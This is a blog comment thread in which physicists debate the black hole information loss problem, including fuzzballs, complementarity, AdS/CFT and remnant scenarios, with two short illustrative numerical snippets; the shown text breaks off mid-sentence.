I did not understand about Ashtekar's model. 
At least in his talk he said the information would come out early (before the Planck phase), and I am skeptical about that for the same reasons you mention. That however is not in his paper that is published. I think it is supposed to be in the upcoming paper, I hope that will clarify this. You are right that a direct and concrete calculation is missing. I hope to see one within the next few years :-) Bee: Thanks for the reply. By BH forming conditions I am talking about mass densities that exceed those of a neutron star or a quark star. Something between a BH and a quark star does not seem to be theoretically eliminated. The question regarding BHs has always been: Do they exist in nature? Not what their properties are if they form. If you are talking about black holes of about solar mass, you can fiddle around with the equation of state of nuclear matter if you like. But that is hardly going to avoid black holes in general. Are you satisfied that BHs actually exist? Am I satisfied? Not sure what you mean by this. The formation of a black hole horizon is a very generic consequence of initial conditions in GR that plausibly exist throughout our universe. I find the evidence we have convincing. There are certainly other explanations - there are always other explanations for everything, but I'd say if it walks like a black hole and quacks like a black hole, I would call it a black hole. Unless I have good reason to throw out this conservative answer. And I see presently no good reason. What is considered the biggest problem with sending the information of a Planck mass black hole out to a baby universe that looks like ours? The entropy? Bee, I think I'm generally much more of a paranoid pessimist than you are so I think that's just another name for objective realist... and if only you could find a topic where Lubos and Amos could be on opposite ends of a debate, that would be real entertainment! "At least in his talk he said the information would come out early (before the Planck phase)." Hmm... looking at his paper he draws a Penrose diagram that looks like the standard one until one gets near the singularity, and he says that fluctuations in the geometry are small outside that region. It will be a neat trick if he manages to get the information out before the Planckian phase under those conditions. I find it a bit worrisome that he doesn't in his paper discuss this issue of how the info gets out, except in a very superficial way. Perhaps it would have been advisable to forgo the "mission accomplished" title before getting this straightened out. The reason might simply be that the paper is a PRL and they have a strict page limit. But yes, I too will be curious to see how they manage to do that, and I am looking forward to a more detailed explanation. Best, Peter: look at my comment above. I think we have a case of non-standard use of scientific terms. The question the authors of this paper discuss, and Ashtekar as well, is whether information is "destroyed" by the singularity, or whether it passes through it. This may be an interesting question, or it may be a pseudo-question, depending on how the singularity is treated in QG. Be that as it may, this is not the question you and I (and nearly everyone ever thinking about the information paradox) have in mind, namely: does the information become accessible to an outside observer (i.e. observers like us), and if so when and how? 
In Ashtekar's model the mission he accomplishes is a smooth passage through a singularity, he does not discuss whether the information can then end up at the original external region, and one may be skeptical for all the well-known reasons. as a Gentleman, I will surely not annoy you with more inconsistencies! It's enough that I am annoyed by them. Now I understand a bit better why you dislike the fuzzball or nontrivial BH microstates in general. You think that by avoiding the horizon, one is "radically" modifying GR, in the same way as Chapline who says that BHs don't exist and superconductors etc. stop them from forming. ;-) Well, except that she's not modifying GR or denying their birth. In string theory, one can show e.g. that a graviton is exactly a vibration mode of a string, an object that seems to have much more internal structure. In fact, with high enough UV resolution, such a string extends over huge distances. But it's all just an unobservable illusion because this stringy graviton acts on matter exactly in the same way as a normal graviton - even though it also looks "extended". In the same way, black holes may be demonstrated to have an entropy, so they must have microstates, and it just happens that the microstates look very chaotic. But the issue one should try to understand is that the apparent "complexity" of such fuzzballs is only there if one studies really pure states and if one studies them with a perfect, Planckian resolution. Any averaging over space or many microstates will tend to smoothen the space and create horizons (or almost horizons). The universal message above is that "purely gravitational" things zimply have extended structure according to string theory - gravitons and black holes are structured objects whose influence on strings and branes (all other matter) can be demonstrated to be exactly equivalent to the purely gravitational objects (in the case of BH, after averaging over microstates). They can't really look structureless because even gravitons and space itself is made out of strings. All this stuff may sound very subtle but that's all possible because string theory is really a unifying theory of gravity and all other objects. So even though the fuzzball looks like a "completely different object" made out of non-gravitational "matter", it is really the same thing as a black hole microstate, and can be shown to act in the same way, on everything that can exist in the theory. In these cases, one shouldn't really even talk about "emergence" because e.g. the stringy graviton mode is *exactly* the same thing as a graviton. The point here is not to approximate anything. The formalism just works in such a way that it is a precise identity. One is literally proving that gravitons and holes have a microscopic structure and what it is. One can see similar things in Matrix theory, AdS/CFT, and elsewhere. For example, when one constructs a thermal state - out of microstates that can be explicitly constructed - it can be seen that e.g. in the path integral formalism, physics will have contributions from (Euclidean) black holes as long as the theory allows dynamical gravity in the bulk, which string theory always does. Indeed, it seems you have come much closer to understanding my disliking. I don't need to tell you that, but let me add for the interested reader who might not know, that the 'fuzz' inside the fuzzball fills up the region that would have been the interior of the horizon. 
In fact, the extension of these objects is not Planck-sized or anything nearby, instead it is a number dependent on the initial (string) setting, times the Planck scale, that sets their extension. In this way, one gets violations of locality on distance scales of the horizon, which can be arbitrarily large, and at arbitrarily low background curvature. According to the terminology in our paper, this is "radical". It is certainly an interesting scenario. However, to solve the information loss problem it implies that some collapsing matter would have to fuzz out into some stringy state at arbitrarily low densities, somewhere around the time when classically the horizon would have formed - though I don't actually know of any dynamical investigation of the scenario that would describe such a collapse, so I am not sure one can actually conclude that. I also think the scenario assumes unbroken supersymmetry and most of the investigation has focused on extremal black holes, though I think there is some recent work to generalize this. Please correct me if I'm wrong, I am certainly not an expert on this. "I think we have a case of non-standard use of scientific terms... this is not the question you and I (and nearly everyone ever thinking about the information paradox) have in mind." Well, it is not of much use to discuss what either of us perceives as "standard use of scientific terms", but let me clarify the reason for our use of the term information loss problem. As far as I am concerned, what is paradoxical about the original setting Hawking discussed is that it leads us to conclude there is a disagreement between classical General Relativity and quantum mechanics - a non-unitary evolution - that cannot simply be blamed on our lack of understanding of quantum gravitational effects. Non-unitary evolution implies information loss, thus the name information loss problem. However, there is nothing particularly paradoxical about an observer in region A not having information about region B. Generically, this will also lead to non-unitary evolution, but this is not in conflict with quantum mechanics, it thus doesn't bother me. Now one could of course say it is not nice if the observer at A never learns what is in region B. This reminds me of a discussion on the issue I had a long time ago with my first supervisor. His final argument for disliking such a possibility was that God would not disconnect himself from a region of his spacetime. 
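To put the point just made in concrete terms, that an observer restricted to region A generically ends up with a mixed state and an effectively non-unitary description without any conflict with quantum mechanics, here is a minimal numerical sketch. It uses a plain two-qubit Bell state as a stand-in for the pair of regions; the example is purely illustrative and is not a model of black hole evaporation.

    import numpy as np

    # Two qubits: one in region A, one in region B, prepared in a Bell state.
    psi = np.zeros(4)
    psi[0] = psi[3] = 1 / np.sqrt(2)              # (|00> + |11>)/sqrt(2)
    rho = np.outer(psi, psi.conj())               # pure state of the full system
    print(np.trace(rho @ rho))                    # purity of the full state: 1 (pure)

    # The observer in A has no access to B and must trace it out.
    rho_A = np.trace(rho.reshape(2, 2, 2, 2), axis1=1, axis2=3)
    print(rho_A)                                  # 0.5 * identity: maximally mixed
    print(np.trace(rho_A @ rho_A))                # purity 0.5 < 1, not a pure state

The reduced state in A is mixed and its evolution alone need not be unitary, yet the full state stays pure and ordinary quantum mechanics is untouched.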
Assuming that information is returned to the external observer, there needs to be some large number appearing in an unexpected way. Either you need nonlocal effects on scales much larger than the Planck length, or you need to believe in the existence of PLanck mass objects with lifetimes arbitrarily larger than the PLanck time. I think this is a misunderstanding. We certainly didn't say anywhere that the remnant decays in Planck-time or something of that sort. That section was merely supposed to summarize the discussion and to say that if you look into the calculations that were actually done to address the question how long that last phase would take, there isn't much, and that what we could find doesn't seem to apply to the case without horizon and large internal volume. I have no strong opinion about that either way, I just don't find the status of arguments very conclusive. Best, I am very puzzled by something. The string theorists here seem to think that the whole problem is virtually solved; one even sees sentences like, " This is also well understood." If that is the case, what remains to be done? One school of thought seems to be that essentially *nothing* remains to be done; all that remains is to translate the solution into the gravitational language on that side of the duality. And some people even seem to think that this is mere icing on the cake; maybe a gravitational description isn't really *necessary*. I think that's extremely short sighted. What is *really* needed is a way to get us out of AdS and into the real world; unless somebody can perform a miracle and bring Strominger's "dS/CFT" back to life.... Dear Peter, don't believe what you say. For example, there doesn't seem to exist any material difference between my and Moshe's attitudes. Moshe is an Israeli Canadian while I have never been to these countries, we never shared any real teachers, and so on. Still, we end up with the same conclusions. The qualitative answers to the big questions about the paradox are known by today, and if we're dreaming about something, it's a more "local" intuition or description of what's going on, especially inside the hole. But we're not guaranteed that such an additional thing exists so it is not clear whether the search for it makes sense. Dear Dr Who: I don't believe that dS/CFT was a step to the real world or a new necessary ingredient to understand dynamics of black holes in the real world. The de Sitter space is much tougher - its empty version carries a huge entropy itself - and the predictable quantities in it are always "vague", affected at least the thermal radiation from the cosmic horizon. dS/CFT has never worked and I am tempted to think that after years of sensitivity about it, Andy would agree today. If you neglect cosmological differences - the tiny acceleration of expansion - and study the local physics, the mystery of black holes in AdS, flat, or dS space is clearly equivalent. Sabine: one more thing about the "fictitious nonlocality". If you consider e.g. Matrix theory (BFSS model), a matrix quantum mechanics with a U(N) group equivalent to M-theory for large N, the graviton - the simplest and lightest state in the theory - is an extremely complicated wave function of X-coordinates and theta-coordinates filled into N x N Hermitean matrices. If you look at the typical "size" of this bound state of D-branes, it scales like N^{1/3} (and around special directions, N^{1/9}). 
The relevant physics is for infinite N, so this bound state looks extremely extended, nonlocal (imagine N being 10^{900}). But various dualities guarantee that if you have these "macroscopic clouds" going through each other, their interactions are almost exactly zero. It's a priori surprising, but with the knowledge of dualities, it is known to be true, and is a part of our "improved intuition". In a similar way, the string itself is an extended object - the typical average x(sigma)^2 over the string is infinite if you send the UV cutoff to infinity. Still, these objects act as locally as you expect from a point-like graviton. The black holes are analogous in this sense, so this "nonlocality" of the fuzzball is largely undetectable. The issue here is that the parts of the graviton/hole that are very far are associated with extremely huge frequencies (very fast degrees of freedom), so they average out very quickly to zero in all measurements (similar argument like one for the classical limit of a Feynman path integral where the typical trajectory that contributes is extremely unsmooth, too). So only at the central regions of the graviton or hole, they "really" influence things. In the case of the string (or matrix) graviton, it acts like point-like particle, in the case of the black hole, it acts like an empty black hole after one averages over a few microstates (which makes phases in whatever average out to zero). So in some sense, imagining that the black hole remains "horizonful" is a similar "classical" mistake as imagining that Feynman's path integral is dominated by smooth trajectories. It's not and the typical quantum fluctuation is such that the whole space, at least inside, looks very different. Even in flat space, one could say that the typical configuration of QG in the quantum state is complicated. But it is "ordered", in some way. On the other hand, with the presence of event horizons, the horizon region must be able to "scramble" the degrees of freedom quickly, so that the black hole (inside the horizon) cannot be imagined as a quantum fluctuation around a particular smooth classical state. The very fact that the black hole quickly scrambles/thermalizes information is equivalent to the degrees of freedom being permuted in brutal ways. Still, it doesn't contradict the smooth character of the "mixed state" of these microstates. Thanks for the explanation, that is interesting. I have one more question though. I think we are still talking slightly past each other as I said we have only considered real black holes that dynamically form, whereas you have been describing the static case. Could you elaborate somewhat one how you envision that collapse process to happen in the scenario you describe? Especially I would be interested in what happens to the distribution of energy density. Best, Lubos: it can't be as simple as that -- you can't recover the information solely by the assumption that black hole microstates are really extended fuzzy objects. I assume that an infalling observer will experience falling through the horizon in the same way as predicted by the standard black hole geometry (if this is not true then you can throw out standard results like thermal Hawking radiation). If so, then you have the usual quantum xerox problem: the information about the observer is inside the horizon, but the outside observer says that this information is coming out with the Hawking radiation. 
At this stage, a string theorist might invoke the "black hole complementarity principle" to argue that the information hasn't really been duplicated. The trouble is that there is no independent evidence for this principle beyond its use in solving the above paradox, so the argument becomes circular. The point is that even after making your reasonable sounding assumptions, you still need to make a much more radical assumption later on for the story to work. If a generic microstate has quasi nonlocal behaviour (I realize it averages out classically) and indeed from its point of view no horizon is formed, then couldn't you simply run the argument utilized against lorentz violating theories by say analyzing its behaviour in a highly boosted frame? In fact, are boosts even a symmetry of the system at that stage? Dear Bee, it may be that I won't answer what is really interesting for you, but for me, the actual collapse of a star/dust that creates a black hole is a boring messy classical process. Classical general relativity with the correct low-energy effective theory inserted is an OK description to describe all macroscopic facts about this collapse. And the microscopic details are so chaotic that it makes no sense to study them - one can't formulate any exact questions that I could see. Precise questions become possible when energy etc. can be measured accurately, and to do that, one needs a lot of time - by the uncertainty principle. The black hole birth is qualitatively similar to the birth of any other thing that eventually stabilizes. I don't know what's the best example - for example the igniting of the nuclear reaction in a nuclear power plant. Well, it has some profile, space distribution etc. that engineers should better know a bit. But it follows some low-energy equations and I don't see any contradiction or puzzle here. Before the object is born (or reactor works), the deviation from the ultimate stationary state is large, but it collapses exponentially (by quasinormal ringing modes etc.) as the stationary state is being approached. So sorry if you view the collapse as a part of mysterious quantum gravity - I see no quantum gravity in it whatsoever. Dear Peter, if you ignore the relevant evidence and only use circular arguments, statements can sound circular. It still doesn't prove that they're untrue. In fact, it doesn't mean that there is no better evidence that actually proves that the complementarity is right. And be sure that this evidence exists. In all the holographic descriptions we have, the "boundary" or otherwise non-gravitational description is manifestly mapped to the degrees of freedom outside the black hole only, so complementarity is manifest. So is the extended, difficult, "nonlocal" nature of the microstates, so the only thing that is left is to show that by coarse-graning, one can actually derive the classical physics in the interior, too, and I claim that this is now established at least in some specific examples, too. Papers were cited above. This simultaneous validity of all these qualitative insights above - nonlocal physics that nevertheless looks local whenever it should - may have sounded improbable according to the intuition of the 1970s. But the experience teaches us otherwise and we must learn - and replace our common sense by an "uncommon sense" that actually incorporates what has been calculated. 
an individual black hole microstate surely breaks the Lorentz symmetry spontaneously - much like any complicated state breaks all symmetries in the region it occupies. On the other hand, this symmetry is restored if one considers expectation values averaged over all the microstates. So the "ensemble" of all these microstates preserves the Lorentz symmetry in regions near the horizon, at least with accuracy that becomes perfect for large black holes. Such a restoration of the symmetry is a nontrivial assertion that is an interesting thing to check in any description of black holes we have - and it hasn't been checked in all of them, as far as I understand, even though from a path-integral perspective, it has to work. But it is only possible because the fundamental laws of the theory still respect local Lorentz symmetry. It is pretty likely that if the symmetry is broken at the fundamental level, one will observe its violation even after any averaging over any microstates, especially if the physics near the horizon - which is extremely sensitive to the behavior of the theory - is considered. In all the holographic descriptions we have, the "boundary" or otherwise non-gravitational description is manifestly mapped to the degrees of freedom outside the black hole only, so complementarity is manifest. This of course contradicts your previous story. If CFT microstates are mapped to extended fuzzballs in the bulk, then for these states the CFT has access to the whole space. The event horizon might emerge after coarse graining, but this won't change the fact that the CFT is describing the entire space. Your version of complementarity is nothing more than the statement that physics outside the horizon is described by variables outside the horizon. The basic problem is the following. In the fuzzball story, the information about an infalling observer comes out in the Hawking radiation in the same way that it would if the observer were falling into a ball of fire. In both cases, for the information to be imprinted in the radiation it is necessary that the observer be burned up in the process. So if you believe in the fuzzball scenario and in the usual rules of quantum mechanics, then you predict that the infalling observer will not fall smoothly through the would-be horizon, but will get destroyed. That's unavoidable. Maybe it's true, but it clearly signals a dramatic breakdown of semi-classical physics. You can't just wave your hands and invoke complementarity here. These fuzzball geometries are horizon free and obey the usual rules of quantum mechanics as far as anyone knows, without some mysterious new complementary rules appearing.If AdS/CFT is a complete description then these new rules have to be derived from this starting point. so the only thing that is left is to show that by coarse-graning, one can actually derive the classical physics in the interior, too, and I claim that this is now established at least in some specific examples, too. Papers were cited above. Anyone following this line of research will know that nothing like this has been done in the context of a large semi-classical black hole. Conversation has strayed quite a bit from the original one, which is probably a good thing. Let me just comment that there are some issues we know almost for certain to be correct - for example the observations of an outside observer in asymptotically AdS space are described by a unitary QM (we can write it down explicitly). 
I think you'd find very few people that are familiar with the evidence and think otherwise (call them mavericks if you will), including people who at some point strongly held an opposite viewpoint. This is valuable because now we can make progress and ask different series of questions, like the ones Peter is asking here. For example what is the viewpoint of an infalling observer, and how does their semi-classical viewpoint emerge. Fuzzballs (horizon free geometries) are one proposal top deal with such issues, it is not without problems. I think it is fair to say the view of the community is split on these questions. That just means they are more interesting questions to discuss than yet another iteration of the same old arguments about the information paradox. Lubos: to your question. First, we did share some teachers, I certainly think about Tom as one...but to the point, I like the viewpoint of generic non-locality, and approximate locality depending strongly on a specific limit and the set of questions asked. Let me just say that the non-local quantities people discussed at various points in the past, like the size of the graviton in matrix theory, or the size of the string in perturbation theory, always strike me as formal non-measurable quantities. But again, I agree that the implied picture smells right. It seems that once again we disagree on what is boring and what is interesting, which is a discussion that in itself I find boring. Let me therefore just add that as long as you can't describe the dynamical scenario - the collapse of an object into a black hole and its evaporation (or at least, as Peter suggests, something falling into a black hole and its information being reemitted) - you haven't even formulated the problem, not to mention solved it. I assume that an infalling observer will experience falling through the horizon in the same way as predicted by the standard black hole geometry ... If so, then you have the usual quantum xerox problem: the information about the observer is inside the horizon... The scenario Lubos is talking about doesn't have a horizon. It is actually the causal diagram in Fig 3 in our paper (even though he insists the only viable option is (1)). The difference is that he is envisioning information can come out before the Planckian phase because there are non-local effects on horizon scales. That is not the case we have considered in option 3 (in the "conservative" case information doesn't come out before the Planck phase), but that doesn't change the diagram. I don't want to put words into his mouth, but I think the underlying idea is somehow that the information falls into the fuzz, wanders around in there for some while but eventually finds its way out, which is possible because of the messed up causal structure. Best, Just to reiterate, the following statements seem mutually incompatible: 1) A black hole is really a horizon free fuzzball geometry governed by the usual rules of quantum mechanics 2) An observer falling into a fuzzball experiences this roughly as they would falling into a standard black hole geometry 3) Information about the infalling observer is emitted to the outside by Hawking radiation well before the fuzzball/black hole gets to Planckian size. Something has to give. As Bee remarks, it's not clear that there's even a proposal as to how the fuzzball scenario is supposed to work in detail. 
I think that the main point of Bee's paper is correct: the only scenario that doesn't change the usual rules outside of the Planckian domain is one in which the information gets emitted in the last stages of Hawking radiation by a Planckian black hole whose singularity has been resolved. But of course this scenario requires these Planckian black holes to have an extremely long lifetime, and there is no evidence of this occurring. Peter, the scenario in which the information is encoded in the Hawking radiation also does not require any modification of known physics. For a generic high energy state in any theory the deviations from thermality are very small, so you'd need some very fine measurements to distinguish the state of the Hawking radiation from a thermal one. Semi-classical gravity does not provide you with such fine probes, which is why the question of whether the Hawking radiation is exactly thermal or not is a question for quantum gravity. Phrased differently: even in any ordinary QM system, say anharmonic oscillator, the question of whether perturbation theory is valid is quantity-dependent. So the fact that all curvature invariants are small outside the black hole only means that we can use semi-classical gravity for dealing with SOME calculations. WE get approximately the right answer as long as the quantities we calculate are not too complex, or we don't require too much accuracy. Dear Moshe: Let's suppose the observer falls into the fuzzball and then the external observer carries out the needed fine measurements on the emitted Hawking radiation that encode all the information about the infalling observer. If, as you say, there is no modification of known physics, then since information can't be in two places at once, we conclude that the infalling observer has been burnt up (or bleached, as they say). But this contradicts the description that follows from using the standard black hole geometry. So one way or another, there has to be a violation of the usual physics. Peter, as I emphasized above, all we know in high degree of certainty is that the Hawking radiation outside of the black hole encodes the information, and that this is not that surprising, and does not require any modifications of physics in places we thought it was valid. I agree that a more explicit solution, phrased in a more intuitive and local bulk language, is desirable. The question of the infalling observer is a different one, personally I'm not committed to the fuzzball proposal, partially because of all the good issues you raise. I also have to add that personally I am not that troubled by all the quantum xerox type paradoxes. The reason is that the statement that an observer (presumably modeled by some localized excitation) falls through the horizon is an approximate semi-classical one. In the exact quantum mechanics everything fluctuates and you cannot make this statement precisely. So, I am not sure one can build any sharp conflicts with QM using such an inherently semi-classical concept as the infalling observer. I may be wrong, but it seems to me you can explain away subtle differences by having small probability that the observer isn't precisely what you thought it was. Note that this is very different for the external observer, sitting far away where the metric does not fluctutate much. That observer has every right to believe their observations are described by ordinary unitary time evolution. 
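A small numerical aside on the statement above that the deviations from thermality of simple observables are far too small for semi-classical probes to resolve: the sketch below only evaluates the standard Bekenstein-Hawking entropy of a solar-mass Schwarzschild hole; the exp(-S)-type suppression of such deviations is the generic statistical-mechanics expectation being invoked in the comments, not an output of this little calculation.

    import numpy as np

    # Bekenstein-Hawking entropy of a Schwarzschild black hole: S/k_B = 4*pi*G*M^2/(hbar*c)
    G, hbar, c = 6.674e-11, 1.055e-34, 2.998e8    # SI units
    M_sun = 1.989e30                              # solar mass in kg
    S = 4 * np.pi * G * M_sun**2 / (hbar * c)     # entropy in units of k_B
    print(f"S/k_B ~ {S:.2e}")                     # roughly 1e77

Corrections of order exp(-10^77) to any coarse expectation value are unresolvable by any conceivable semi-classical measurement, which is the sense in which the radiation can look thermal to such probes while still encoding the initial state.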
Moshe, by "known physics" I was including the statement that an infalling observer just sees the usual smooth geometry, but if you remove this assumption then I agree there is no problem. I have to say I'm surprised that this xeroxing doesn't bother you more. Either the infalling observer gets burned, or the fuzzballs have to be acting in a very different way than any other known complex excited system. For all known systems the burning is what makes it possible for the radiation to carry out the information. Peter: I agree that an infalling observer should see a smooth geometry, which is why I am not comfortable with the fuzzball proposal. In my mind one can still derive such an effective description (for an appropriate set of measurements described by low energy gravity), while having a complete description that is very different. In such situations, not that uncommon in physics, you replace questions such as "what really happened" with more precise ones involving measurable quantities. The mental picture you employ depends on the set of questions you ask. Anyhow, none of this is in any conflict with the observation that the Hawking radiation outside the black hole encodes all the information, which is the only point I'm trying to make. "the scenario in which the information is encoded in the Hawking radiation also does not require any modification of known physics. For a generic high energy state in any theory the deviations from thermality are very small, so you'd need some very fine measurements to distinguish the state of the Hawking radiation from a thermal one. Semi-classical gravity does not provide you with such fine probes, which is why the question of whether the Hawking radiation is exactly thermal or not is a question for quantum gravity." While the question whether Hawking radiation *is* thermal or not might not be a question for quantum gravity, the question how you *get* information from the initial state into the not-quite thermal radiation is. See, I have no problem with the radiation not being thermal per se. I agree that this could necessitate very fine probes. What I don't see is how you dynamically transfer the information from the collapsing object (or infalling observer) into the radiation without any substantial deviations from the semi-classical approximation well outside the region where you would expect it. "In the exact quantum mechanics everything fluctuates and you cannot make this statement precisely." Except that there is no reason why there should be substantial fluctuations at the horizon. Best, Bee, the question of "how" the information becomes accessible is different from "whether" it does. Since we now know with near-certainty that it does (in my opinion), it is time to discuss different scenarios and proposals for the "how" question, without getting distracted by the "whether" question any more. Just my opinion. As for the "how" question, let me try to phrase my personal faith. Comments are welcome, I'm not really a religious type. So, let me describe the formation and evaporation of a BH from the two perspectives of the infalling and outside observer. For an outside observer, the matter forming the black hole becomes hotter and hotter as it reaches the horizon. It starts probing short distance physics. For coarse grained probes this is described effectively by having a stretched horizon: a hot membrane just slightly outside where the horizon would be. 
If you have a complete theory of the outside observer, just as we do in AdS/CFT, we know how to calculate the deviations from that picture, but to be sensitive to those we need to go beyond semi-classical gravity. This is more or less well-established in the asymptotically AdS context. The infalling observer viewpoint is less established. Maybe the following is not too far fetched: Let us describe the last stages of the "burning" process from the would-be-infalling observer viewpoint. The basic point is that the set of natural (low energy, gravitational) probes available to that infalling observer is different. They probe naturally a different coarse-graining of the same system. Presumably, their coarse-grained probes can be described approximately by an effective metric which is the one inside the horizon. That picture becomes less and less accurate as you get closer to the singularity of that effective metric. I think the key to this mental exercise is stop looking at the metric as the whole truth, and accept that it is an effective description valid only for specific type of observations. It is then not inconceivable that two observers, making very different coarse grained measurements, describe their partial truth using different mental pictures. Moshe, I don't mind if there are two different mental pictures, but I do mind that the information about the infalling observer is in two places at once (with that observer inside the fuzzball and in the radiation). This means that the fuzzball is not obeying the usual rules of quantum mechanics. Peter, I did not mention fuzzballs, because I doubt the burning process as viewed by an outside observer can be described using an effective geometry only. But, to your question: in the scenario I described there only one information, and it propagates by a unitary evolution in the full theory. However, there is no invariant meaning to "where" it is. Since the infalling and outside observer are capable of asking very different set of questions, they will answer that "where" question very differently. Which only means that is not a good question to ask in the full story. Ok, so you have a complicated microstate that spontaneously breaks Lorentz symmetry. But then this means there are goldstone modes and higher energy states that do respect this symmetry (eg individual strings I guess). So we go from a fundamental lorentz invariant theory to a complicated emergent mess that breaks locality somehow (incidentally are there any associated fuzzball operators that are gauge invariant?), but then that averages away (kind of like how lorentz symmetry is restored on the lattice in the continuum) in some classical statistical limit. So i'm still unclear how locality is violated in all this, given the fundamental description in terms of strings, and surely that has to give way slightly if we are to believe bh complementarity and holography. Also, why are we counting fuzzball degrees of freedom rather than the more fundamental stringy ones? Looking for a science process that reveals some of the quandary about what is presented helps toward that end may be interesting thinking in relation QGP processes? Penrose (2004, p.803): “Under normal circumstances, moreover, one must regard the density matrix as some kind of approximation to the whole quantum truth. For there is no general principle providing an absolute bar to extracting detailed information from the environment. 
Maybe a future technology could provide means whereby quantum phase relations can be monitored in detail, under circumstances where present-day technology would simply ‘give up’. It would seem that the resort to a density-matrix description is a technology-dependent prescription! With better technology, the state-vector could be maintained for longer, and the resort to a density matrix put off until things get really hopelessly messy! It would seem to be a strange view of physical reality to regard it to be ‘really’ described by a density matrix (…)” Having recognition of muon detection processes in Gran Sassois it evidenced enough then that such a process(microscopic blackholes) help to orientate our thinking in that experimental sense. Not to ignore IceCube either. It's a matter of having a larger perspective(bulk descriptions are fine to me:)while discussing the formalities. Lubos was working toward that end. While Moshe is being realistic yet still far from pinpointing. A preference perhaps. Dear Moshe, I didn't know Tom was literally or effectively teaching you! OK, that changes much about my comment, of course. But still, you're not Czech, are you? ;-) Peter: if you expand the gauge theory perturbatively etc., you see black holes with horizons, and you don't see inside. If you don't do such an expansion and study the microstates on the boundary, you do see the microstates and there's no horizon. There's really no contradiction here. The low-energy description with GR - or SUGRA - only emerges in the planar limit in 1/N expansions, for large N, and if you do it, the GR with horizons and complementarity emerges. If you don't do it, there is nothing special about the interior because you don't see it. You don't see any smooth bulk geometry, after all, but the unitarity is as obvious as in any nongravitational system. Moshe: I completely agree that the large sizes of the BFSS bound states etc. are unmeasurable. That was really my point. But don't you think that in a similar way, the large size of a BH microstate (or fuzzball, but let me avoid the word below) is analogous, at least with worse than Planckian probes? Bee: that's interesting that you find the "interesting vs. boring discussion" boring because you're the only one who is trying to open this discussion all the time. I am not interested in it. I am interested in the "correct vs incorrect" issues. I may be wrong, but it seems to me you can explain away subtle differences by having small probability that the observer isn't precisely what you thought it was. Moshe, If, with probability near 1, the information comes out, then if you believe conventional quantum information theory and the semi-classical view of a black hole, with probability near 1 the in-falling observer must be destroyed near the horizon. It's possible that the observer can be saved (until he approaches the singularity) at the same time as unitarity can be saved, by some black hole complementary principle, but nobody has figured out how this works, and you can't say its conventional physics. Peter Shor: the scenario I gave in my previous comment is consistent with QM unitarity and with each observer's viewpoint of the part of spacetime accessible to them by using only low energy probes (note that this expression has different meaning for both observers). Of course there are a lot of details to fill out, especially on how the viewpoint of the two observers are related. So, it is definitely far from being established. 
But, this seems to me the minimal scenario that is not inconsistent with the known facts about low energy gravitational physics and quantum information theory, all well-established parts of physics. Maybe I'm wrong. The only thing you sacrifice is the ability to ask questions that are not necessarily well-defined in the full theory, like "where" things happen. If the geometry (or more precisely geometries) are just effective descriptions of the situation for certain probes, in a certain limit, the question of "where?" would always be answered with another question: "using which probes?". Well, Moshe, that's all very impressive in a way, though I fear that you severely underestimate the difficulties of making precise the notion of "geometry" as an "effective description" [of what?] Still, if I may drag you back to the main point of Sabine's original post: why do you prefer this to the solution proposed by Horowitz and Maldacena, which allows us to dispense with weird things happening near the horizon? I find the H+M paper almost as amazing and stimulating as Maldacena's "eternal black holes" paper. It certainly deserves far more attention than fuzzballs. As far as I understand the Horowitz-Maldacena paper (and I'm trying to translate it into everyday terms), it says that we have a definite quantum state at "the end of time," that is, at the singularity inside a black hole, as well as "the beginning of time," that is, the Big Bang. Wouldn't this mean that somehow, time runs backwards near the singularity. Can this really be made to work consistently? Should this be detectable in the neighborhood of black holes? Pope, I don't understand the M-H paper very well, maybe I'll invest some time trying to do that. It may well be the way things work for an in-falling observer. I am also not sure it necessarily contradict the complementarity picture. As for the effective description, this may be not as difficult or alien as you think. Lots of progress is being made in realizing the ways geometry can emerge from ordinary QM systems in certain limits. AdS/CFT is probably the best understood example, the gauge theory is the fundamental description, it doesn't look like a gravitational theory on AdS, not at all. Nevertheless, there is an AdS hiding in there, with gravitons and strings and black holes and all those other good things. They are all only approximate concepts, valid in a certain limit, provided you don't ask questions that are too probing of the underlying structure. Peter Shor: If, with probability near 1, the information comes out, then if you believe conventional quantum information theory and the semi-classical view of a black hole, with probability near 1 the in-falling observer must be destroyed near the horizon. I am sorry, Mr Shor, but if all the information gets out and if the semiclassical picture holds at the same moment, then one can derive that you are a pink elephant. Or anything else. Simply because these two things are incompatible with each other. If there is an exact horizon, the information gets lost exponentially and it can never come out again, because of simple constraints of causality, regardless of your fairy-tales about the events near/at the singularity. That Hawking has proven by this simplified proof is pretty much equivalent. The singularity is irrelevant: the causal limitations come from the horizon. I wonder how many centuries it will take before well-known academicians around physics start to take notice. As I continue to read Prof. 
John Moffat’s book while looking at all the frenzied comment activity that your most recent paper has raised, I can’t help but wonder, what if Moffat’s right? I realize that modified gravity theories don’t get much attention by way of respect, as the dark matter/dark energy scenarios are what's most broadly accepted. Yet if, on the off chance, he is right, then all of this discussion either way would have little significance. With his theory, there is no dark matter and the rapid expansion is explained with a repulsive aspect to gravity, as a consequence of, and in combination with, a fifth force (an additional degree of freedom). What however is most important relating to this discussion is that there are no singularities or event horizons and thus no way to violate the 2nd law, or better, no reason to be concerned that it is being violated. With all the problems that dark matter and dark energy bring, along with the additional concerns about entropy (information) loss raised here, I’m further left to wonder why this idea hasn’t received greater attention. Strangely enough it also seems somewhat consistent with Smolin’s idea that the only thing being non-emergent is time, for both matter and energy emerge with t=0 in Moffat’s proposal, lending no significance other than to mark when both a negative- and a positive-time universe began. However this would not be what we recognize as the beginning of time in general, but strictly time as it relates to these universes. In other words the time that preceded and continues is what Smolin might call waiting time, as in fundamental time. So if being conservative is to be the criterion for what’s considered relevant, perhaps it should also be asked whether this idea is not the most qualified? The singularity is irrelevant: the causal limitations come from the horizon. I wonder how many centuries it will take before well-known academicians around physics start to take notice. You are correct that the causal limitations come from the horizon, nobody ever debated that. But that isn't the problem. You have yourself discussed a scenario without future horizon (see definition in paper) and without a singularity. Now the only thing you need to realize is that if the solution was quantum singular (see definition in the paper), the information would not only be caught inside either an apparent horizon (option 3) or indeed an event horizon (option 4), but it would actually be destroyed and lost in the singularity. The reason this doesn't happen in the fuzzball is that it's quantum non-singular. If you think about it for a while you will realize that the scenario you are advocating is quite similar to our option 3, except that you are convinced information can come out before the Planckian endphase. Lubos: Let me try again. Yes, it is true that semi-classical gravity can be thought of as a 1/N expansion. This means that if you compute something in this expansion, finding that higher order terms are more and more suppressed, you should conclude that any errors to semi-classical gravity are of order something like exp(-1/N). Now apply this to the infalling observer for very large N. In this expansion you will find that with probability roughly 1 the observer falls smoothly through the horizon, keeping his information intact. You therefore conclude with near certainty that this information can't be 